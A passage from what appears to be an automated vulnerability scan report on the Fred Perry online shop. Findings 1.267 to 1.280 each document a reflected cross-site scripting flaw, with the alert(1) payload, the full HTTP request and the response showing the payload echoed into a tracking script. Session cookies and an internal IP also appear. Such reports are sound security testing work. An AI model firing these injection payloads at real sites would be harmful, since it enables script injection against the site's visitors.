Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=0g3pt5mes9t1hnr5s0vl9v3pk6; expires=Tue, 09-Nov-2010 17:04:53 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/shirts/?e2d16"-alert(1)-"a05c72fdefc=1");
//]]>
...[SNIP]...

1.267. http://www.fredperry.com/women/skirts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/skirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ad15"-alert(1)-"728545c861 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women2ad15"-alert(1)-"728545c861/skirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2do6j1q2fvqoha0sk554ck7jb6; expires=Tue, 09-Nov-2010 17:09:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women2ad15"-alert(1)-"728545c861/skirts/");
//]]>
...[SNIP]...

1.268. http://www.fredperry.com/women/skirts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/skirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f9c8"-alert(1)-"3fa819d4374 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/skirts1f9c8"-alert(1)-"3fa819d4374/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m60qji43298l5lpmehltqknat7; expires=Tue, 09-Nov-2010 17:09:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/skirts1f9c8"-alert(1)-"3fa819d4374/");
//]]>
...[SNIP]...

1.269. http://www.fredperry.com/women/skirts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/skirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f77ce"-alert(1)-"386d0fe9234 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/skirts/?f77ce"-alert(1)-"386d0fe9234=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8c21fmkpr5eg0k356pfa2pbb66; expires=Tue, 09-Nov-2010 17:07:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/skirts/?f77ce"-alert(1)-"386d0fe9234=1");
//]]>
...[SNIP]...

1.270. http://www.fredperry.com/women/t-shirts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/t-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9b0f"-alert(1)-"ae623475fab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womend9b0f"-alert(1)-"ae623475fab/t-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j0ul9h5mu39ujejiljj4rrape5; expires=Tue, 09-Nov-2010 17:10:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womend9b0f"-alert(1)-"ae623475fab/t-shirts/");
//]]>
...[SNIP]...

1.271. http://www.fredperry.com/women/t-shirts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/t-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb784"-alert(1)-"01ef9dfe59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/t-shirtscb784"-alert(1)-"01ef9dfe59/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ppmqmsgne1hf0t6hk5mtjo9s20; expires=Tue, 09-Nov-2010 17:11:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/t-shirtscb784"-alert(1)-"01ef9dfe59/");
//]]>
...[SNIP]...

1.272. http://www.fredperry.com/women/t-shirts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/t-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66544"-alert(1)-"f7acbf1dc58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/t-shirts/?66544"-alert(1)-"f7acbf1dc58=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ha85bn91m4herp3o8gp8d0bhp4; expires=Tue, 09-Nov-2010 17:09:24 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> T-Shirt
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/t-shirts/?66544"-alert(1)-"f7acbf1dc58=1");
//]]>
...[SNIP]...

1.273. http://www.fredperry.com/women/tennis/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/tennis/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a53c7"-alert(1)-"994703c0c99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womena53c7"-alert(1)-"994703c0c99/tennis/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=fo3o6qv4af1kubaotq1ts943l4; expires=Tue, 09-Nov-2010 17:05:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womena53c7"-alert(1)-"994703c0c99/tennis/");
//]]>
...[SNIP]...

1.274. http://www.fredperry.com/women/tennis/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/tennis/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cf10"-alert(1)-"ad3cd9e9c46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/tennis4cf10"-alert(1)-"ad3cd9e9c46/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=apfgaeqod633ssa6ckondoiia3; expires=Tue, 09-Nov-2010 17:05:57 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/tennis4cf10"-alert(1)-"ad3cd9e9c46/");
//]]>
...[SNIP]...

1.275. http://www.fredperry.com/women/tennis/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/tennis/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb341"-alert(1)-"426635fe36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/tennis/?bb341"-alert(1)-"426635fe36=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1123hl90vej508idi45n7idds2; expires=Tue, 09-Nov-2010 17:04:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Tennis
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/tennis/?bb341"-alert(1)-"426635fe36=1");
//]]>
...[SNIP]...

1.276. http://www.fredperry.com/women/trousers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/trousers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload febe6"-alert(1)-"e4e83b03fd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womenfebe6"-alert(1)-"e4e83b03fd7/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:08:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gph8cguvj4t1eieejeie3ppq33; expires=Tue, 09-Nov-2010 17:08:29 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womenfebe6"-alert(1)-"e4e83b03fd7/trousers/");
//]]>
...[SNIP]...

1.277. http://www.fredperry.com/women/trousers/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/trousers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4b5d"-alert(1)-"465b00fb799 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/trousersa4b5d"-alert(1)-"465b00fb799/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:08:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hbq1jlki9npmfs836p444rlnf0; expires=Tue, 09-Nov-2010 17:08:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/trousersa4b5d"-alert(1)-"465b00fb799/");
//]]>
...[SNIP]...

1.278. http://www.fredperry.com/women/trousers/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/trousers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea727"-alert(1)-"53defb14701 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/trousers/?ea727"-alert(1)-"53defb14701=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f6glm1hr1i5labspr11vtjaf66; expires=Tue, 09-Nov-2010 17:07:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Trouser
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/trousers/?ea727"-alert(1)-"53defb14701=1");
//]]>
...[SNIP]...

1.279. http://www.fredperry.com/women/woven-shirts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/woven-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66513"-alert(1)-"6d7e2439d02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women66513"-alert(1)-"6d7e2439d02/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qvi6uvqv40uokanqel4ccrt0e6; expires=Tue, 09-Nov-2010 17:09:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women66513"-alert(1)-"6d7e2439d02/woven-shirts/");
//]]>
...[SNIP]...

1.280. http://www.fredperry.com/women/woven-shirts/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
